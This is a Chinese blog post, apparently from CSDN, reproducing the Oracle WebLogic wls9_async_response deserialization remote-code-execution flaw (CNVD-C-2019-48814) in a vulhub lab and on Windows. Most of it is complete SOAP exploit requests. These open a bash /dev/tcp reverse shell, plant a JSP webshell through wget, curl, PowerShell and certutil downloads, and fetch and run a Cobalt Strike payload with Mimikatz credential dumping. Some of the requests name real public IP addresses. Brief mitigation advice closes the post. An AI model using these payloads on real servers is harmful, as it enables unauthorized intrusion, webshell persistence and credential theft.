CNVD-2019-48814 Weblogic wls9_async_response 反序列化RCE漏洞复现

最新推荐文章于 2023-04-05 14:31:24 发布
最新推荐文章于 2023-04-05 14:31:24 发布
阅读量297 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/128043640
版权

0x00 事件背景

2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,官方补丁尚未发布,漏洞细节未公开。CNVD对该漏洞的综合评级为“高危”

0x01  漏洞情况分析

WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。

部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。

CNVD对该漏洞的综合评级为“高危”。

0x02 漏洞描述

近日,互联网爆出WebLogicwls9-async反序列化远程命令执行漏洞。攻击者利用该漏洞,可在未授权的情况下远程执行命令。该漏洞危害程度为高危(High)。目前,官方补丁尚未发布,漏洞细节未公开。

0x02  漏洞影响范围

  1.影响产品:

  • Oracle WebLogic Server10.3.6.0.0
  • Oracle WebLogic Server12.1.3.0.0
  • Oracle WebLogic Server12.2.1.1.0
  • Oracle WebLogic Server12.2.1.2.0

 2.影响组件:

  • bea_wls9_async_response.war
  • wsat.war

0x03  漏洞复现

一、liunx下的环境搭建
  • 攻击机: Kali2019  
  • 漏洞靶机:ubuntu16.04(docker  vulhub)    Weblogic10.3.6(wls1036_generic.jar)

1.在Ubuntu 16.04上安装docker和docker-compose:

(1).安装PIP
curl -s https://bootstrap.pypa.io/get-pip.py | python3
(2).安装docker
curl -s https://get.docker.com/ | sh

(3).启动docker服务

service docker start
(4).安装docker compose
pip install docker-compose
2.使用方法 
(1).下载漏洞环境项目
git clone https://github.com/vulhub/vulhub.git

(2).进入到nexus利用环境

cd   vulhub/weblogic/CVE-2017-10271
(3).执行如下命令启动weblogic服务
docker-compose up  -d

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

3.检测方法

用户可通过访问路径http://ip:port/_async/AsyncResponseService来判断该组件是否开启。若返回如下页面,则此组件开启。请及时采取防护措施

打开URL(http://IP:端口/_async/),提示错误403且含有“From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:”­可判断存在Oracle Oracle WebLogic wls9-async反序列化远程命令执行漏洞。

http://149.248.54.82:7001/_async/AsyncResponseService
二、linux下.漏洞利用
1.反弹shell利用:
(1).攻击机主机的IP地址如下,并用nc监听反弹端口
(2).通过burpsuit向weblogic服务发送攻击包,如下图所示 
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 853
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
(3).可以看到成功反弹shell
2.上传webshell
(1).在kali攻击机上可搭建一个简单的web服务器,然后将webshll.txt放到其下
(2)使用以下poc进行发送攻击

poc1:

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

poc2:

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
(3).访问webshell
http://149.248.54.82:7001/_async/test.jsp
三、winddows下的环境搭建
1.weblogic 12.1.3.0.0安装
下载地址:https://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
开始安装:(需要java环境支持,记得配置JAVA环境变量)
任选下面其一的安装包,我这里选择的是12.1.3.0

2.打开cmd执行:
 C:\Program Files\Java\jdk1.8.0_152\bin\java   -jar    c:\fmw_ 12.1.3.0.0_wls.jar

用 C:\Program Files\Java\jdk1.8.0_121\bin\ 目录下的 java.exe 来执行weblogic12c的jar包(默认使用顺序,似乎首先用的是C:\Program Files\Java\jdk1.8.0_121\jre\bin\下的java.exe,所以会包jre不是有效的JDK),所以在cmd里要输入  C:\Program Files\Java\jdk1.8.0_152\bin\java   -jar    c:\fmw_ 12.1.3.0.0 _wls.jar(这里之所以要用Progra~1 来代替Program Files是因为有 空格 会识别错误)
3.等待一会会弹出安装程序:

4.配置完成后,找到startWebLogic.cmd双击启动weblodgic
19041909308ee6d90abf81cce6.png 

5.访问http://127.0.0.1:7001/console验证
四、windows下的漏洞利用:
1.打开地址http://ip:port/_async/AsyncResponseSevice查看是否存在漏洞
2.反弹shell, 可直接使用CobaltStrike生成一个payload.ps1 powershell脚本,将该脚本放到公网上,然后使用以下poc进行发送: 
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
可以看到成功在cobalstrike上反弹出目标系统的shell

3.上传webshell
(1).放置一个webshell.txt到公网主机上(这里是kali主机)
2.使用以下poc进行发送请求:
poc1: 
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
poc2: 
POST /_async/AsyncResponseService HTTP/1.1
Host: 172.16.191.51:7001
Content-Length: 870
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>certutil -urlcache -split -f http://149.248.17.172:81/jshell.txt   servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
(3).访问webshell

http://172.16.191.51:7001/bea_wls_internal/webshell.jsp

0x04  漏洞修复建议

目前,Oracle官方暂未发布补丁,临时解决方案如下:

1.删除该war包并重启webLogic;

2.通过访问策略控制禁止 /_async/* 路径的URL访问。

建议使用WebLogic Server构建网站的信息系统运营者进行自查,发现存在漏洞后,按照临时解决方案及时进行修复。

附录:

附录其他辅助工具:

https://github.com/backlion/nse_vuln/blob/master/weblogic/CNVD-C-2019-4814/weblogic-CNVD-C-2019-48814.nse

https://github.com/backlion/WebLogic_CNVD_C2019_48814

<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">

渗透测试中心
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CNVD-C-2019-48814:CNVD-C-2019-48814 Weblogic wls9_async_response反序列化利用工具
03-16
CNVD-C-2019-48814
WebLogic反序列化远程命令执行(CNVD-C-2019-48814
weixin_51151498的博客
12-07 825
WebLogic反序列化远程命令执行(CNVD-C-2019-48814
CNVD-C-2019-48814 WebLogic反序列化远程命令执行漏洞
yyj1781572的博客
04-05 734
WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台。而wls9_async_response组件主要是为WebLogic Server提供异步通讯服务。通过本实验大家可以掌握验证CNVD-C-2019-48814漏洞的方法和对其进一步的利用。学会如何修复此漏洞
Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现
ditanji3425的博客
05-06 1944
一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8。 CNVD 编号:CNVD-C-2019-48814CNVD对该漏洞的综合评级为“高危”。 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远...
WebLogic wls9-async 反序列化漏洞(CNVD-C-2019-48814)复现
qq_38348692的博客
08-16 1719
准备环境: (1)kali 2.0 (2)windows server 2008 R2 (3)jdk-8u68-windows-x64 , 在安装jdk时,要避免在路径中出现空格及中文。 (4)weblogic服务器安装包 12.1.3 server 2008 服务器上安装jdk,并配置环境变量。在cmd输入java和javac后不报错即配置成功。 安装weblogic:...
weblogic漏洞CNVD-C-2019-48814
netqi1990的博客
09-09 1383
weblogic远程代码执行漏洞漏洞号:CNVD-C-2019-48814漏洞分析:漏洞复现影响版本:漏洞处置建议删除war包处理方式操作:软件代理处理方式操作:Apache 做代理,禁止访问某个目录:Nginx 做代理,禁止访问某个目录总结: 漏洞分析: weblogicasync_response组件用于为WebService提供异步通讯功能。远程访问用户可通过访问路径http://ip...
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve...
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
WebLogic_CNVD_C_2019_48814.exe
06-12
WebLogic_CNVD_C_2019_48814漏洞扫描器,扫描主机是否存在WebLogic反序列化漏洞
CNVD-C-2019-48814-CNNVD-201904-961:CVE-2019-2725poc汇总更新绕过过CVE-2017-10271补丁POC
03-16
CNVD-C-2019-48814和CNNVD-201904-961 感谢t00ls-ximcx0101提供脚本CNVD-C-2019-48814 POC摘要相关链接如下:清水川崎大佬的简书: : 安全祖师爷转发: ://dwz.cn/2GQvbUae由于环境的一些因素路径会存在变化:默认上传路径为: 服务器/ AdminServer / tmp / _WL_internal / bea_wls9_async_response / 8tpkys / war / 服务器/ AdminServer / tmp / _WL_internal / bea_wls_internal / 9j4dqk / war /另外可测试路径: com.oracle.webservices.wls.bea-wls9-async-response_12.1.3 / 2ig01a / war影响范围:WebLog
WebLogic wls-async 反序列化远程命令执行漏洞CNVD-C-2019-48814)的复现过程
weixin_40950781的博客
09-01 1759
WebLogic wls-async 反序列化远程命令执行漏洞CNVD-C-2019-48814漏洞复现WebLogic wls-async 反序列化远程命令执行漏洞CNVD-C-2019-48814)0x01 weblogic简介0x02漏洞简介0x03 影响的系统0x04 复现过程1. 复现环境及搭建过程1)靶机安装jdk2) 靶机搭建weblogic2. 漏洞利用0x05 cobalt...
解决WebLogic Server访问浏览器提示服务不可用异常503–Service Unavailable
u012099568的专栏
06-17 1万+
转载http://www.xwood.net/_site_domain_/_root/5870/5874/t_c262627.html 一、异常描述 启动weblogic应用服务,通过部署名称访问服务,报出“Error 503--Service Unavailable ..From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:..”,如下图所示 异常描述如下 1 2 3 4 5 6 ...
CNVD-C-2019-48814 WebLogic wls9-async 反序列化漏洞
weixin_42140534的博客
03-07 694
0x01 漏洞介绍 中国民生银行红蓝对抗演习时,红队使用这个0day,拿下防守方的服务器 该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/—async/AsyncResponseSerce路径下传入构造好的恶意XML格式的数据,传入的数据在服务器端反序列化,执行1其中的恶意代码,从而可以getshell。 序列化就是把对象转换成字节流,便于保存在内存、文件、数...
CNVD-C-2019-48814Weblogic wls9_async_response 反序列化远程命令执行漏洞复现
weixin_44253823的博客
12-02 642
漏洞概述: (CNVD-C-2019-48814Weblogic wls9_async_response 反序列化远程命令执行漏洞存在于wls9-async组件中,攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,从而造成远程命令执行。 漏洞环境: 服务器:windowsserve...
linux命令发送接口请求
qq_54571327的博客
03-07 303
linux命令发送接口请求
第21篇:判断Weblogic详细版本号的方法总结
ABC_123的博客
09-04 5693
Part1 前言在日常的渗透测试、红队评估项目中,中间件层面的漏洞挖掘是非常重要一环,Weblogic中间件在最近几年接连被爆出很多高危漏洞,基本上都是可以直接拿到权限的。主流的Weblogic漏洞包括HTTP协议上的CVE-2017-10271、CVE-2019-2729等,但是其影响weblogic的版本为12.1.3之前版本。如果能事先判断出weblogic的版本号是大于12.1.3的,...
【webservice】调试方法篇(二、java的http请求)
生活没了创意,那跟咸蛋有什么区别
09-04 2002
基于HttpURLConnection类开发的webservice调试程序
Weblogic wls9_async_response 反序列化远程命令执行漏洞CNVD-C-2019-48814
热门推荐
SoulCat
04-26 1万+
Weblogic wls9_async_response 反序列化远程命令执行漏洞CNVD-C-2019-48814漏洞概述: 该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,从而可以getshell’。 漏...
CNVD-2019-36999
最新发布
06-20
CNVD-36999是中国国家信息安全漏洞共享平台(CNVD)发布的安全漏洞报告编号。该漏洞通常与具体的软件或系统有关,但没有提供足够的上下文来确定它是关于哪个产品或服务的具体漏洞CNVD是中国的一个权威机构,负责收集...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值